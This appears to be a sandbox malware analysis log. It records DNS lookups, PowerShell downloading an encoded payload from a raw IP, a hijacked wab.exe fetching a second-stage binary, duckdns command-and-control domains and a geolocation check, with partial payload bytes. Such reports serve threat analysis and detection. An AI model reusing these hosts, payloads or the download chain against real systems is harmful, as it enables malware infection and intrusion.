                                                                                                              May 2, 2024 01:14:16.537513971 CEST1.1.1.1192.168.2.50xa97aNo error (0)www.google.com142.250.80.100A (IP address)IN (0x0001)false
                                                                                                              May 2, 2024 01:14:16.537802935 CEST1.1.1.1192.168.2.50x6e50No error (0)www.google.com65IN (0x0001)false
                                                                                                              May 2, 2024 01:15:00.103951931 CEST1.1.1.1192.168.2.50x5765No error (0)jgbours284hawara01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                                                                                              May 2, 2024 01:15:02.597037077 CEST1.1.1.1192.168.2.50x7abfNo error (0)jgbours284hawara02.duckdns.org45.88.90.110A (IP address)IN (0x0001)false
                                                                                                              May 2, 2024 01:15:03.196261883 CEST1.1.1.1192.168.2.50xfc96No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                              May 2, 2024 01:15:16.085412025 CEST1.1.1.1192.168.2.50x76ceNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                              May 2, 2024 01:16:00.130646944 CEST1.1.1.1192.168.2.50xa879No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                                                                              HTTP Request Dependency Graph

                                                                                                              • www.google.com
                                                                                                              • slscr.update.microsoft.com
                                                                                                              • https:
                                                                                                                • www.bing.com
                                                                                                              • 87.121.105.163
                                                                                                              • geoplugin.net

                                                                                                              HTTP Packets

                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.54970787.121.105.163803748C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              May 2, 2024 01:14:05.894881010 CEST174OUTGET /Subumbilical.dwp HTTP/1.1
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                              Host: 87.121.105.163
                                                                                                              Connection: Keep-Alive
                                                                                                              May 2, 2024 01:14:06.062803030 CEST1289INHTTP/1.1 200 OK
                                                                                                              Date: Wed, 01 May 2024 23:14:05 GMT
                                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                                              Last-Modified: Wed, 24 Apr 2024 13:33:25 GMT
                                                                                                              ETag: "72d2c-616d7b70b1340"
                                                                                                              Accept-Ranges: bytes
                                                                                                              Content-Length: 470316
                                                                                                              Keep-Alive: timeout=5, max=100
                                                                                                              Connection: Keep-Alive
                                                                                                              Data Raw: 36 77 4c 4b 33 75 73 43 68 58 69 37 32 47 30 54 41 48 45 42 6d 2b 73 43 62 58 59 44 58 43 51 45 63 51 47 62 36 77 4b 4a 72 72 6c 50 49 69 49 4b 36 77 4b 4c 35 6e 45 42 6d 34 48 78 4c 75 6f 42 65 4f 73 43 44 68 62 72 41 6a 53 6c 67 66 46 68 79 43 4e 79 36 77 49 32 2f 48 45 42 6d 2b 73 43 77 42 74 78 41 5a 75 36 32 4f 72 55 6b 33 45 42 6d 2b 73 43 63 39 54 72 41 6f 6c 73 63 51 47 62 4d 63 70 78 41 5a 74 78 41 5a 75 4a 46 41 74 78 41 5a 74 78 41 5a 76 52 34 75 73 43 4b 31 78 78 41 5a 75 44 77 51 52 78 41 5a 76 72 41 73 7a 4a 67 66 6e 6f 42 45 34 44 66 4d 31 78 41 5a 76 72 41 6d 50 63 69 30 51 6b 42 4f 73 43 38 32 39 78 41 5a 75 4a 77 2b 73 43 71 30 46 78 41 5a 75 42 77 35 7a 74 61 41 42 78 41 5a 76 72 41 6f 5a 6d 75 74 52 45 6f 6a 62 72 41 68 72 39 63 51 47 62 67 66 4a 54 65 69 68 46 36 77 49 2b 58 48 45 42 6d 34 48 79 68 7a 36 4b 63 33 45 42 6d 33 45 42 6d 33 45 42 6d 2b 73 43 2b 4f 44 72 41 72 34 2b 36 77 4b 4e 56 34 73 4d 45 48 45 42 6d 33 45 42 6d 34 6b 4d 45 2b 73 43 6f 71 48 72 41 70 58 7a 51 6e [TRUNCATED]
                                                                                                              Data Ascii: 6wLK3usChXi72G0TAHEBm+sCbXYDXCQEcQGb6wKJrrlPIiIK6wKL5nEBm4HxLuoBeOsCDhbrAjSlgfFhyCNy6wI2/HEBm+sCwBtxAZu62OrUk3EBm+sCc9TrAolscQGbMcpxAZtxAZuJFAtxAZtxAZvR4usCK1xxAZuDwQRxAZvrAszJgfnoBE4DfM1xAZvrAmPci0QkBOsC829xAZuJw+sCq0FxAZuBw5ztaABxAZvrAoZmutREojbrAhr9cQGbgfJTeihF6wI+XHEBm4Hyhz6Kc3EBm3EBm3EBm+sC+ODrAr4+6wKNV4sMEHEBm3EBm4kME+sCoqHrApXzQnEBm+sCIpOB+kT2BAB11OsCpzXrAsWciVwkDHEBm+sC/tKB7QADAADrAq5ScQGbi1QkCOsC8svrAnV4i3wkBHEBm3EBm4nrcQGbcQGbgcOcAAAA6wJ/h3EBm1PrAt+jcQGbakDrAp/r6wK9FInr6wKQQ3EBm8eDAAEAAACAZAPrAijBcQGbgcMAAQAA6wJs3nEBm1NxAZtxAZuJ6+sCEFFxAZuJuwQBAABxAZvrAneHgcMEAQAA6wJqLOsCWtlT6wKxTnEBm2r/cQGb6wJKWoPCBXEBm3EBmzH2cQGbcQGbMcnrAo836wIwAosacQGbcQGbQXEBm3EBmzkcCnX0cQGbcQGbRusCeIVxAZuAfAr7uHXf6wLo03EBm4tECvxxAZtxAZsp8HEBm3EBm//ScQGb6wJJKrpE9gQAcQGb6wLP2jHAcQGb6wKeUIt8JAxxAZtxAZuBNAdnzapM6wK1musCU7yDwARxAZvrAtCXOdB14+sC7bpxAZuJ++sC4ZzrAoo//9frAhsbcQGbXwUjqe6wb/OjPXQx5jriYRi/K4t2euqg5grJInrJg7DssG8Z7iguu96Wnd0pTFsCeUfXKpALRq0B9GLNjuAirV5MW7zH9FMqWr1IyL5JaYsjwKq0vMCfyK3xeM0TwKr99RbyzRPAqqnybax0mfR5 [TRUNCATED]
                                                                                                              May 2, 2024 01:14:06.062947035 CEST1289INData Raw: 58 67 35 74 79 64 6e 4d 71 6b 78 6d 4a 37 69 6a 35 6e 67 55 54 57 66 4e 66 46 7a 59 7a 79 76 4a 32 63 79 71 54 4a 51 6b 30 6b 72 6d 53 42 52 4e 5a 38 32 54 56 37 37 47 2b 76 54 4d 75 4f 63 41 35 44 58 59 51 2b 50 68 53 55 68 6e 6c 53 36 4d 4a 6a
                                                                                                              Data Ascii: Xg5tydnMqkxmJ7ij5ngUTWfNfFzYzyvJ2cyqTJQk0krmSBRNZ82TV77G+vTMuOcA5DXYQ+PhSUhnlS6MJjIn8mbNqjmQjCP5Tc+qTAFIYfIiKqvPAfRhzZFgQ+hp9XnNoWDT+QRMbK8faKR1lkYfZmXNqkPikVWzmPVddImrL5wBTFBEtElqxeK1q0xnqy+e7lDmTWfNXI9L8QMfXx5CeozJqsUiiVyPv0l7KpAOZvmO2QVIZ0l
                                                                                                              May 2, 2024 01:14:06.063142061 CEST1289INData Raw: 4f 54 49 39 48 49 57 34 79 76 79 48 6a 52 32 6a 74 39 72 4f 79 75 2f 71 65 62 50 47 65 59 2b 55 4e 46 42 57 43 75 50 42 76 2f 4c 72 2b 59 4f 56 68 41 33 4b 79 4e 50 64 45 4e 48 45 31 37 32 65 44 4a 74 54 56 71 63 48 55 6c 34 48 6b 6c 2f 6f 67 5a
                                                                                                              Data Ascii: OTI9HIW4yvyHjR2jt9rOyu/qebPGeY+UNFBWCuPBv/Lr+YOVhA3KyNPdENHE172eDJtTVqcHUl4Hkl/ogZehrS3L/sdpS3ISZFsvbkJHF0Z9hMDwnBKliHZes+qTI+cCU5nRB+fZs2q8q+Nc52rRndt131hGhlMP5Vsm2UnAu2Hueoi+BjFoB0McAv0WfwUam0b66KHrbt5HN8+xM2Z+M85Oq+f44+AGnmWCuP8YvVmawSfNsWF
                                                                                                              May 2, 2024 01:14:06.063261986 CEST1289INData Raw: 43 32 51 32 59 2f 36 30 78 6e 7a 61 70 4d 5a 38 32 71 54 47 66 4e 71 6b 78 6e 7a 61 70 4d 5a 38 32 71 54 47 66 4e 71 6b 78 6e 7a 61 70 4d 70 6b 4a 79 4f 44 37 74 72 39 76 43 66 77 49 58 49 5a 30 6a 67 33 51 39 45 48 54 2f 37 54 65 6b 63 47 75 75
                                                                                                              Data Ascii: C2Q2Y/60xnzapMZ82qTGfNqkxnzapMZ82qTGfNqkxnzapMpkJyOD7tr9vCfwIXIZ0jg3Q9EHT/7TekcGuuTO5I6k1nzSP568yqTNkdru/8TFwZPe/UzaF+aIMrTFx0RpyYGux4Jk1nzSPBNs+qTN5PhwYhwqtdZs2qTGfNqkxnzapMZ82qTGfNqkxnzapMZ82qTGfNcM8C+DRNf0xbcYwIg82WLIEBUpsUZeg6v82RZ4o3pUxcb
                                                                                                              May 2, 2024 01:14:06.063288927 CEST1289INData Raw: 6e 7a 61 70 4d 5a 38 32 71 54 47 66 4e 71 6b 78 6e 7a 61 70 4d 5a 38 32 71 54 47 66 4e 64 65 4b 36 37 6a 64 34 39 61 35 65 68 2f 46 6b 4b 37 6f 55 6f 46 37 58 35 69 4f 41 51 5a 7a 32 2f 4d 66 53 30 71 68 4d 5a 35 30 53 6c 32 6c 46 30 6e 6b 61 56
                                                                                                              Data Ascii: nzapMZ82qTGfNqkxnzapMZ82qTGfNdeK67jd49a5eh/FkK7oUoF7X5iOAQZz2/MfS0qhMZ50Sl2lF0nkaVksUUvYNeyv4lBMVjp926OGFxVe/d9bUD6EVH8GiHo4qR/TNuh5aCEx5G+8T5ud+Ur68sj2z3i0y8iQdiTvraMy5kWfNqkxnzapMZ82qTGfNqkxnzapMZ82qTGfNqkxnEQdPlfKtDk1eecctniPJVs+qTN/0LcMd+K
                                                                                                              May 2, 2024 01:14:06.063349009 CEST1289INData Raw: 66 57 6b 37 4f 57 4d 36 56 74 34 32 67 50 54 2b 45 6d 6a 4c 48 68 78 6e 7a 61 70 4d 5a 38 32 71 54 47 66 4e 71 6b 78 6e 7a 61 70 4d 5a 38 32 71 54 47 66 4e 71 6b 78 6e 7a 61 70 4d 5a 78 48 47 4c 44 49 76 52 59 56 70 73 4a 41 4f 6b 62 2f 34 78 2f
                                                                                                              Data Ascii: fWk7OWM6Vt42gPT+EmjLHhxnzapMZ82qTGfNqkxnzapMZ82qTGfNqkxnzapMZxHGLDIvRYVpsJAOkb/4x/LpqExnwqP6vc2qTGfNqkxnzapMZ82qTGfNqkxnzapMZ82qTGfNd2iwMp6N/15yZwHh/CoBwm1+Z82qTGfNqkxnzapMZ82qTGfNqkxnzapMZ82qTGcSDZu9uA+LjiVef34ldoBjzSmIX5wT9oAqrc2WWoHeykxDG97
                                                                                                              May 2, 2024 01:14:06.063404083 CEST1289INData Raw: 2f 76 31 66 5a 74 4f 42 75 59 38 6b 6b 44 43 42 43 75 39 78 74 6b 71 4e 4f 59 38 31 4b 64 30 76 69 75 4e 64 50 69 45 4f 2b 37 30 57 75 4e 43 47 6c 45 6d 47 47 55 79 43 30 33 36 71 79 45 6a 46 6d 2f 53 35 34 51 32 37 76 70 32 41 48 6e 48 48 70 46
                                                                                                              Data Ascii: /v1fZtOBuY8kkDCBCu9xtkqNOY81Kd0viuNdPiEO+70WuNCGlEmGGUyC036qyEjFm/S54Q27vp2AHnHHpFSUQpe14+KXipXP0wfwyKAO2X6ay2YlCuKg8RYzjFGH4tmzaok1UlOjOb5jiCMYRIf3DosJDJMWei5wHfNlOelqfpMWZy6TSzNpJrcswubNsWBxLTRAUhSMkQpOfLWpkEPe0kt1D7aVo8zpglKLnRjtyV4MvSSWHW3
                                                                                                              May 2, 2024 01:14:06.063442945 CEST1289INData Raw: 32 54 37 33 4e 7a 54 46 67 56 41 37 59 43 51 32 66 64 79 6b 78 6e 7a 61 70 4d 5a 38 32 71 54 47 66 4e 71 6b 78 6e 7a 61 70 4d 5a 38 32 71 54 47 66 4e 71 6b 78 6e 7a 61 70 4d 76 4b 42 41 46 76 35 4a 58 44 50 6d 44 30 7a 63 67 70 77 72 70 6f 6c 38
                                                                                                              Data Ascii: 2T73NzTFgVA7YCQ2fdykxnzapMZ82qTGfNqkxnzapMZ82qTGfNqkxnzapMvKBAFv5JXDPmD0zcgpwrpol8g0I2dHZ+O7YrvV91EOfmDLY6fuL40O4vq0b6q5O3GO+JvJ6ULeDr/0MkbOfVDTuXOXR7w1JIfD2u//5tBxDnESzA57NTPugjnd/RHi+WPfV5FTUBRTmlFvfkoO/sVsDf7+iKZVu1QCcahnngM05O/P9KR/9p8uhhb
                                                                                                              May 2, 2024 01:14:06.063807964 CEST1289INData Raw: 68 74 50 49 46 56 6a 31 47 4a 30 70 6c 7a 61 70 44 6f 50 38 34 54 47 66 4e 71 6b 78 6e 7a 61 70 4d 5a 38 32 71 54 47 66 4e 71 6b 78 6e 7a 61 70 4d 5a 38 32 71 54 47 66 4e 71 6b 79 7a 6d 4a 34 67 34 55 51 76 73 6d 62 4e 71 76 53 4a 78 2f 4c 50 55
                                                                                                              Data Ascii: htPIFVj1GJ0plzapDoP84TGfNqkxnzapMZ82qTGfNqkxnzapMZ82qTGfNqkyzmJ4g4UQvsmbNqvSJx/LPUtP/Nn340sfuHqVMcKmqTGfNqkxnzapMZ82qTGfNqkxnzapMZ82qTGfNqph8DtmUaP8YVmfNqkxnzapMZ82qTGfNqkxnzapMZ82qTGfNqkxnDt1sTFjj/Oro5ZhK9vXm7fg+mMyH/fMdljiX5gryEzrNK7u1dkWXMV
                                                                                                              May 2, 2024 01:14:06.064037085 CEST1289INData Raw: 49 36 70 6d 32 7a 64 30 76 62 47 79 66 62 33 61 4b 45 4b 30 67 69 5a 57 34 6f 44 47 2b 4a 67 69 66 69 31 6e 57 53 55 7a 30 32 70 6d 34 44 50 36 65 55 5a 4d 41 32 69 76 68 36 71 57 4b 70 76 6f 57 6e 48 69 32 42 32 74 56 36 73 76 6a 54 6c 4a 63 78
                                                                                                              Data Ascii: I6pm2zd0vbGyfb3aKEK0giZW4oDG+Jgifi1nWSUz02pm4DP6eUZMA2ivh6qWKpvoWnHi2B2tV6svjTlJcxbm4Y7TlkDKG9gL8V+PTF2aLPsOzZCXYqW2TF1ck4v8zZDE7sasRKVUCnxYpH3wDppnUnUvClGYpt4mC1weYIimK+mI1d29a/KvFt+9/X8ozGnH1mh9axFJODIfDGbNqhrZudAKOExcVLR6b82RTGS9/USsqfrjQpj
                                                                                                              May 2, 2024 01:14:06.229943037 CEST1289INData Raw: 61 75 6a 4f 33 4c 4e 6b 30 4a 2f 31 57 49 55 69 43 51 64 30 75 48 70 6c 32 42 4e 7a 36 55 34 50 4c 58 47 36 37 4f 39 43 67 79 45 53 58 73 57 7a 6d 41 33 34 77 43 53 2f 66 50 74 2b 37 4f 77 35 6a 70 35 61 70 57 47 4b 34 76 47 78 48 45 73 35 6a 70
                                                                                                              Data Ascii: aujO3LNk0J/1WIUiCQd0uHpl2BNz6U4PLXG67O9CgyESXsWzmA34wCS/fPt+7Ow5jp5apWGK4vGxHEs5jpQVKHV+9DuLKt1+quTsxXIIUOCnfZVMN8lfR3G+DbnbG/QSn7nsQL+3NsFSRubtA4y9imgbAvnK/+aHpRwFJ1IchXiDPXHKtEQulAk/B3elgDOrUxbPYfZH82mGxwl55s2xYHMpNEBSGA8dd/Nh/a+kWROdrLe9+IY


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.2.54972887.121.105.163808024C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              May 2, 2024 01:14:57.639704943 CEST187OUTGET /DtExZZndAxdvvlCKCcIVF127.bin HTTP/1.1
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                              Host: 87.121.105.163
                                                                                                              Cache-Control: no-cache
                                                                                                              May 2, 2024 01:14:57.807414055 CEST1289INHTTP/1.1 200 OK
                                                                                                              Date: Wed, 01 May 2024 23:14:57 GMT
                                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                                              Last-Modified: Fri, 19 Apr 2024 13:56:34 GMT
                                                                                                              ETag: "78c40-6167374a0a880"
                                                                                                              Accept-Ranges: bytes
                                                                                                              Content-Length: 494656
                                                                                                              Content-Type: application/octet-stream
                                                                                                              Data Raw: cd 35 d7 c9 f4 b1 88 7b f9 de 0f 6c 25 93 b5 11 35 e8 20 bc 54 6c f6 68 52 c0 77 b0 c3 6e 24 b1 1e 06 a2 d1 a8 86 ee 10 50 76 16 84 9f f3 b2 ce 71 72 57 29 96 b3 e5 50 d2 7b 15 5a ad 43 ae 1d 21 5f 39 04 dd f3 e1 d6 aa a6 63 a1 8b d1 83 4c 2f c7 da b2 69 00 ce 06 79 e0 a9 bf 88 ef 8b 1a 84 41 b2 d5 3e 6a 43 f3 87 8c 83 94 27 c2 1a 7d ff db b3 f3 c0 c8 bd c9 2a a3 8d 0c 50 77 60 8b 1e 2e 0d 48 bc 87 8f f7 bb e9 72 82 de eb a8 75 61 a5 f6 34 d2 17 58 0c d4 9a 4d 6e 6a 60 26 99 2b 16 14 55 b3 00 d7 b4 72 f6 ad 37 b7 47 e1 42 75 ef 6d 0f 45 bc 07 e2 23 8f b9 f0 ab 24 d0 b2 6a ea 89 be a0 33 9d d2 6d 0e 6c 6f c4 3c 12 24 42 79 7b 47 69 cb 8b be bc 81 ef 0c 2a 3a 1b 48 bd 91 bc 2c c3 2b a2 71 5b 98 23 7e 40 10 ae 6b c7 5a ba b8 8d 22 1c 26 9a 70 9f e4 3d 49 26 0c 6b 62 73 7f 82 a7 13 e0 1f bd 9b bf 3f 70 b9 3c 85 f6 30 2e f6 37 de 3a 1f ff 94 15 ac 76 51 af 82 84 09 7e 80 4e 7b 1c 65 61 47 89 88 3c 85 32 19 f3 f1 7f f1 26 33 98 9e ce 23 ea 54 a2 98 95 43 86 16 d0 57 75 fc 84 63 2e 22 8f b6 07 76 fc db 23 [TRUNCATED]
                                                                                                              Data Ascii: 5{l%5 TlhRwn$PvqrW)P{ZC!_9cL/iyA>jC'}*Pw`.Hrua4XMnj`&+Ur7GBumE#$j3mlo<$By{Gi*:H,+q[#~@kZ"&p=I&kbs?p<0.7:vQ~N{eaG<2&3#TCWuc."v#HUWSh6wRxUB-amhS<|'eawg_S=V0<G%*<KF]b3`=+/t{-gy^nb~lI[K"@O!bGI}Rp?@s_UHDNW?zKxDvar6_7|%jQcVEO\8 /rZiYF"/YTd*J)yjcHH1+]IyPY$7H[q)_A-la9*Oul>-9xXMs7w0v 6-&FTKSMSdGO6$0N(>J8<*bE.~5k.{(%Fx$r HJ<L1>{QTv3v^lu#:B}?=$N1jG)e7vD$7l#LU^0._5F<Fvs']X7q-5,1Nz}|A6}$~vU=*ST$G?@ [TRUNCATED]
                                                                                                              May 2, 2024 01:14:57.807452917 CEST1289INData Raw: b1 4a a1 19 bf fb 1c 6e 19 46 0c 1d 7c f9 d6 4e 6d 8f 07 d2 f0 6b d4 2a d0 c0 7c 4e db 4d e2 ef 9f 21 5f e9 c1 b9 23 ce 1a ce 20 28 d2 92 82 2b 82 b2 1e c4 78 5e 48 22 4d f5 11 82 85 90 36 18 31 74 c3 cb 9c 0a f2 cb 88 92 17 5f 7e 85 d9 bf 43 69
                                                                                                              Data Ascii: JnF|Nmk*|NM!_# (+x^H"M61t_~CiM|/h5r9A<SW0>GF7 Jbq8uGZ0aHH6z^1.kH~Ar>u@-o]}oevu`[}:rEbM>{?'vNCL
                                                                                                              May 2, 2024 01:14:57.807488918 CEST1289INData Raw: 09 97 2f 4a 80 6a 00 97 c5 80 b8 89 f8 88 07 54 27 87 41 da 96 bf 2f 43 1b fd be 80 94 7e 01 72 30 7e 9e b3 1b ae fa be c9 73 60 e5 5b c1 33 60 63 72 03 b4 46 e5 f0 ee 5b 1b 14 73 26 45 f8 ff 1d 51 15 6f 94 81 3f 3f 96 10 ca 6e 0d 63 65 c9 b3 5f
                                                                                                              Data Ascii: /JjT'A/C~r0~s`[3`crF[s&EQo??nce_6rS?~L}#0jF!&:L\b*LV(xBC>}Q5qSyLJ[NKhO0RXdFG`S6,NtP9cX}Ih>
                                                                                                              May 2, 2024 01:14:57.807527065 CEST1289INData Raw: 4a e3 08 c9 58 7f 3c a2 9e 6f b3 52 a6 e5 81 a3 c1 10 58 c5 9b 6e 54 0d c0 3f aa 3c bd f1 bc 5c 17 a7 32 1e 00 c3 40 40 e0 d4 59 ef 96 7d c8 02 fc 53 4b 2d 5f ce ae 2a f7 3e b3 5f c7 29 bf 2e 2e b8 dc b7 6d 03 4f db ac 1c 58 ce 07 5b 0b 52 f4 7f
                                                                                                              Data Ascii: JX<oRXnT?<\2@@Y}SK-_*>_)..mOX[R0$mwDeBk%GMy0~^a%1<|x>ETCY0*ZK^?]bY!0"y+/vM.^;#!|gXSI'wXm4Gdc&=E_C2$Y]
                                                                                                              May 2, 2024 01:14:57.807564020 CEST1289INData Raw: 05 cd d4 c9 99 ff 05 2f dd 33 cb f1 62 f6 e5 57 c2 e4 e8 c3 0c 04 e9 1c 37 c4 46 6a 5e 6e 9f 05 8f ec 2c 32 7d 83 05 42 39 69 0e 4c f5 d2 06 d2 5a 88 b2 19 65 80 ed 96 40 0d a0 cf 27 86 1c 62 92 ce 82 fd 45 3d a6 b3 93 20 95 4b 8d 9d c5 d9 2b 51
                                                                                                              Data Ascii: /3bW7Fj^n,2}B9iLZe@'bE= K+Qa?z,@2+qGFKrpIG.:(?&f||@U0X^dV5^8J/f,)ZMF;Qx&h*)p05<Zsyy~?X\0
                                                                                                              May 2, 2024 01:14:57.807601929 CEST1289INData Raw: 57 65 2f 64 9e 39 a0 cb b4 7b d3 56 ec ba 64 53 6c 2e 69 84 09 27 69 01 b4 dd c0 74 9d 80 1a 52 43 07 a8 42 e5 ad 89 e4 8c f6 4e 36 6b a1 82 e7 56 e4 fb 79 db 1f 9a 6f 1a d0 2a 48 31 ad ef f8 a1 0e b7 43 2b 52 33 88 79 74 69 50 59 b4 83 e6 3f e6
                                                                                                              Data Ascii: We/d9{VdSl.i'itRCBN6kVyo*H1C+R3ytiPY?'oadI-hldNK^<Ex{OQUe7!j^SrZ/ZvM. i:)*'t6tjv(29T8P8ibpj&r
                                                                                                              May 2, 2024 01:14:57.807640076 CEST1289INData Raw: d8 e2 b9 3b 64 78 a1 2e ca ce ca 92 c5 d6 5e 5b fc 53 30 7d 9d 44 cf e9 14 04 3d 58 14 5e db 90 37 69 40 c5 d6 9b 93 f1 a2 2b c5 d5 9d c5 8a 89 c5 da 62 c6 2b 8b 2e 5f 6a b2 a3 3d e6 3a 53 ac 60 7c aa b9 73 cd b3 62 92 f9 24 72 a5 be 15 ff a9 1e
                                                                                                              Data Ascii: ;dx.^[S0}D=X^7i@+b+._j=:S`|sb$r1qW@p}p34VB'J+^+X$mm[j]4{4T54)+KGi%!?[,HUvJ++V(>,5?%:D\SSMjm@e
                                                                                                              May 2, 2024 01:14:57.807677984 CEST1289INData Raw: 0a 72 de 9f 69 ed 76 5d 7c 41 2f a7 34 32 ae d5 68 82 d4 e1 0d 7e 00 dd 66 a2 1d 9f 00 b9 02 57 2b 4a ca 79 ca 3b dc f6 78 26 1d 15 9c f5 79 1b c4 2b 02 a9 94 56 76 89 b2 2c aa fb c6 dc 31 a7 be 7a 7d 87 49 94 67 41 36 7d fa bd 08 24 73 55 cb 76
                                                                                                              Data Ascii: riv]|A/42h~fW+Jy;x&y+Vv,1z}IgA6}$sUvUkj&p=w%E4[h$l;c,vf:;Y<_8V$)do>F>Y]j)*?(i06<_X`&@m5+|vb}
                                                                                                              May 2, 2024 01:14:57.807730913 CEST1289INData Raw: a7 d0 c0 7c 1e 50 83 0a 50 69 de a0 02 fe 34 66 de 4a 43 6d 3c 3a 10 82 2b 3b 86 de ce 68 5e 5d 2d 4d f5 29 07 bf dd 66 7d 20 4f 28 aa c5 c9 4b e7 48 90 eb 3c 0f c5 31 ce da 84 89 58 34 71 32 f0 ba 91 31 2b dc 61 ba b1 25 aa 95 43 9e 91 c3 a7 a4
                                                                                                              Data Ascii: |PPi4fJCm<:+;h^]-M)f} O(KH<1X4q21+a%C_vf-]y.CcLf6YF;7)#{:H#O^j9h"=}b{Mi?r,P}w6^t;<mle%WQD~>W*Xl]vHv
                                                                                                              May 2, 2024 01:14:57.807770014 CEST1289INData Raw: 9d 0c 78 0f 47 98 74 3d 6e 59 df 50 7d 1b dc 22 42 36 29 e7 a9 10 10 9e be 56 ef ce 34 82 b0 b8 48 6f 72 4b 82 31 ec 95 77 db 55 88 8d 86 b0 78 b4 b0 5d a2 9d f2 f4 c2 1b a0 08 5c 76 bb 62 9a 8e 2a ad 60 48 4b d7 10 39 2e 3c 94 5a 82 75 41 f5 17
                                                                                                              Data Ascii: xGt=nYP}"B6)V4HorK1wUx]\vb*`HK9.<ZuA h5yb6bQe98;G"7}CK6A~T{`prU$VWB;UL/\vr?VM<$lqdwO<S9YbMO%]Q#$}T`8{`A4tJb5_
                                                                                                              May 2, 2024 01:14:57.974562883 CEST1289INData Raw: c1 0e 06 62 71 a7 3b 8b 9f 7a 58 32 f4 c9 53 2a 7b aa 52 43 f3 e6 2f c8 dc e4 53 4b ad a5 11 0b 6e 32 91 2e ad a8 19 a8 25 c7 bb 1f b6 0e 1f 7f bf 7d 9f 9c 41 60 8d d5 fe 38 b3 8a 03 0f 2f 0a 06 8c 75 2c bb ff 43 37 a1 ba bc 40 35 02 34 b0 a3 f2
                                                                                                              Data Ascii: bq;zX2S*{RC/SKn2.%}A`8/u,C7@54S^1 B0:P|m]N"?FzjF:?w2bEgcI@d]5;G9"1Xsm@A)'0{B6K,o


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              2192.168.2.549733178.237.33.50808024C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              May 2, 2024 01:15:03.365511894 CEST71OUTGET /json.gp HTTP/1.1
                                                                                                              Host: geoplugin.net
                                                                                                              Cache-Control: no-cache
                                                                                                              May 2, 2024 01:15:03.536905050 CEST1173INHTTP/1.1 200 OK
                                                                                                              date: Wed, 01 May 2024 23:15:03 GMT
                                                                                                              server: Apache
                                                                                                              content-length: 965
                                                                                                              content-type: application/json; charset=utf-8
                                                                                                              cache-control: public, max-age=300
                                                                                                              access-control-allow-origin: *
                                                                                                              Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 [TRUNCATED]
                                                                                                              Data Ascii: { "geoplugin_request":"191.96.150.225", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                              HTTPS Proxied Packets

                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.549714142.250.80.1004434952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-05-01 23:14:16 UTC615OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                              Host: www.google.com
                                                                                                              Connection: keep-alive
